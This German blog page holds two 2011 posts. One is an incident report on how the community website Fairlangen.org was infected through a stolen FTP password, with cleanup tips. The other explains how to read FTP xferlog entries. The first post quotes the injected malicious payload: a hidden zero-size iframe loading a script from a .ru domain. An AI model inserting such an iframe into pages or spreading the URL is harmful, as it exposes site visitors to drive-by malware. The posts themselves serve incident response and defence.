Glorf.it

Glorf IT

Bedenkliches aus dem IT-Alltag

26. April 2011 um 17:45

Fairlangen.org wieder entseucht

In unserer Gemeinde betreiben einige Engagierte die sehr erfolgreiche Web-Seite Fairlangen.org. Dabei geht es darum sich darüber auszutauschen, wo man in Erlangen fair gehandelte Waren kaufen kann. Über Wege, die mir noch nicht klar sind, hat ein Bösewicht Zugang zu dem FTP-Passwort der Seite bekommen und ein paar der dort vorhandenen Index-Seiten (index.htm, index.html und index.php) mit einem bösartigen Code-Snippet verseucht. Wirksam war dabei aber lediglich die Seite "index.php". Einem Menschen wäre sicher sofort aufgefallen, dass die index.htm und index.html nur über einen direkten Link aufgerufen werden konnten und eigentlich sinnlos waren (jetzt sind sie Geschichte). Daher vermute ich, dass das alles automatisiert erfolgte.

Einen der Log-Einträge habe ich bereits vorher erklärt (ist nur an zwei Stellen anonymisiert):

Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 /www/htdocs/xxxxxxxx/index.htm b _ o r yyyyyyyy ftp 0 * c
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 /www/htdocs/xxxxxxxx/index.htm b _ i r yyyyyyyy ftp 0 * c

Daran sieht man, dass nicht unser Webserver kompromittiert und dann der Schadcode via CMS eingeschleust wurde, sondern der FTP-Zugriff von einem anderen System (174.37.220.147 sind wir nicht) erfolgte. HIer sieh man, wie eine der verseuchten Dateien gespeichert, manipuliert und noch in der gleichen Sekunde wieder hoch geladen wurde. Danach war sie um ein iframe reicher (Bitte nicht der URL folgen, ist absichtlich kein Link!):

<iframe src="http://quake2012.ru/in.php?a=QQkFBwQHBAEABQQMEkcJBQcEBwAEAwUBAw==" width="0" height="0" frameborder="0"></iframe>

Aus naheliegenden Gründen habe ich nicht ausprobiert, was dieser fremde Link für Code nachlud. Ich hoffe, dass er nicht viel Schaden anrichtete. Unsere Seite würde nämlich sehr schnell von einschlägigen Seiten als bösartig eingestuft. Daher warnten Firefox, Safari und Google vor dem Besuch unserer Seite.

Nach der Änderung aller Passwörter (und dem Eintragen der DB-Passwörter in tausend INIs) und der Bereinigung der Seite, fing die eigentlich Arbeit an. Weil mir unklar war, wie der Gauner an das FTP-Passwort kam (der eigentliche Betreuer der Webseite ist in Urlaub), konnte ich nur vermuten. Es sieht nicht danach aus, als wäre die Seite kompromittiert worden, sondern eher der Rechner eines der FTP-Nutzer dieser Seite. Trotzdem habe ich sämtliche Software darauf aktualisiert, das war ohnehin fällig.

Aus der Erfahrung meine Tipps in der Situation:

  • cool bleiben und nichts einfach löschen
  • Die Domäne einfach mal in ein leeres Unterverzeichnis umleiten oder wenigstens die Index-Seiten als erstes einfach mal umbenennen, um die Leser mit älteren Browsern, die nicht warnen, zu schützen.
  • Das FTP-Passwort ändern.
  • Wenn genug Bandbreite da ist (sehr zu empfehlen): Den aktuellen, verseuchten Stand lokal sichern, sonst nur die infizierten Dateien separat speichern.
  • Mittels einen DIFF-Tool, wie bspw. BeyondCompare (billig und gut) den aktuellen Stand auf dem Webserver mit der letzten lokalen Sicherung vergleichen und die betroffenen Dateien ermitteln.
  • Die Log-Dateien sichten, bei uns wurde ich schnell im FTP-Log fündig.
  • Mit der letzten Sicherung zurück setzen.
  • Alle Passwörter ändern, die in irgendwelchen Dateien stehen, selbst wenn die Dateien nicht per FTP herunter geladen wurden. Ein Bösling könnte sie auch per PHP zippen und dann als Zip runter laden. Ich persönlich wurde das auch tun, wenn ich in den Logs genau sehen kann, dass sonst nicht weiter herunter geladen wurde.
  • Domäne wieder auf den nun sauberen Stand umleiten und nötigenfalls Updates aller Software einspielen.
  • Google, Firefox, etc davon überzeugen, dass wir wieder zu den Guten gehören.

Das Timing war übrigens perfekt: Der eigentliche Betreuer in Urlaub, mein griffbereites letztes Backup Monate alt, Ostern, schönes Wetter, …

26. April 2011 um 17:05

FTP-Log-File verstehen

Am Wochenende musste ich kurzfristig die Log-Files eines FTP-Servers unserer Gemeinde analysieren und kam zum Schluss, dass ein Bösewicht wohl an das FTP-Passwort gekommen sein muss. Die lange Fassung folgt noch. HIer mal vorab der Link, wie man die LogFiles verstehen kann: WU-FTPD – Manual: xferlog.5.

Hier ein Beispiel aus dem echten Leben:

Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 /www/htdocs/xxxxxxxx/index.htm b _ o r yyyyyyyy ftp 0 * c
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 /www/htdocs/xxxxxxxx/index.htm b _ i r yyyyyyyy ftp 0 * c

Das bedeutet:

  • Am 19.4.2011 um 14:02 wurde
  • die Datei "index.htm" aus dem Rootverzeichnis (Verzeichnis anonymisiert)
  • mit der Größe 65 Bytes heruntergeladen
  • vom FTP-Benutzer yyyyyyyy von der IP-Adresse 174.37.220.147
  • gelesen ("o" für "output").
  • Und sofort danach mit der Größe 198 Bytes hoch geladen.

Weitere Infos findet man im WU-FTPD – Manual: xferlog.5.

|